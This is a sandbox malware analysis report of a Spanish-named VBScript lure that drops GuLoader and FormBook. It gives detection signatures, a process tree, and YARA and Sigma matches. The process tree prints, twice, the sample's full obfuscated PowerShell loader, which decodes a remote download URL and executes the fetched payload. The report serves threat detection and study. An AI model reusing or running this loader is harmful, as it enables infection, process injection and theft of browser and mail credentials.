Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1000901 LIQUIDACION.vbs

Overview

General Information

Sample name:1000901 LIQUIDACION.vbs
Analysis ID:1430770
MD5:14ac5b0600701be4d0ed3990a64efce4
SHA1:45778f2240e082952eb68ec11885ccee168498de
SHA256:598ef0ef2670ff8f0dfa5f9849e1723a8a4c20e470a23b6b67d72db9e9146007
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7660 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7728 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7816 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6288 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7192 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6908 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • MSHXUddoGk.exe (PID: 1172 cmdline: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • replace.exe (PID: 2988 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
              • MSHXUddoGk.exe (PID: 5248 cmdline: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 2284 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 1832 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 2148 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 2688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x571b8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x40737:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a130:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x136af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7500.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x100b1:$b2: ::FromBase64String(
        • 0xd44d:$s1: -join
        • 0x6bf9:$s4: +=
        • 0x6cbb:$s4: +=
        • 0xaee2:$s4: +=
        • 0xcfff:$s4: +=
        • 0xd2e9:$s4: +=
        • 0xd42f:$s4: +=
        • 0xf67d:$s4: +=
        • 0xf6fd:$s4: +=
        • 0xf7c3:$s4: +=
        • 0xf843:$s4: +=
        • 0xfa19:$s4: +=
        • 0xfa9d:$s4: +=
        • 0xdb66:$e4: Get-WmiObject
        • 0xdd55:$e4: Get-Process
        • 0xddad:$e4: Start-Process
        amsi32_7728.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x10014:$b2: ::FromBase64String(
        • 0xd44d:$s1: -join
        • 0x6bf9:$s4: +=
        • 0x6cbb:$s4: +=
        • 0xaee2:$s4: +=
        • 0xcfff:$s4: +=
        • 0xd2e9:$s4: +=
        • 0xd42f:$s4: +=
        • 0xf67d:$s4: +=
        • 0xf6fd:$s4: +=
        • 0xf7c3:$s4: +=
        • 0xf843:$s4: +=
        • 0xfa19:$s4: +=
        • 0xfa9d:$s4: +=
        • 0xdb66:$e4: Get-WmiObject
        • 0xdd55:$e4: Get-Process
        • 0xddad:$e4: Start-Process
        • 0x17af0:$e4: Get-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", ProcessId: 7408, ProcessName: wscript.exe
        Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , CommandLine: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, NewProcessName: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, OriginalFileName: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6908, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe" , ProcessId: 1172, ProcessName: MSHXUddoGk.exe
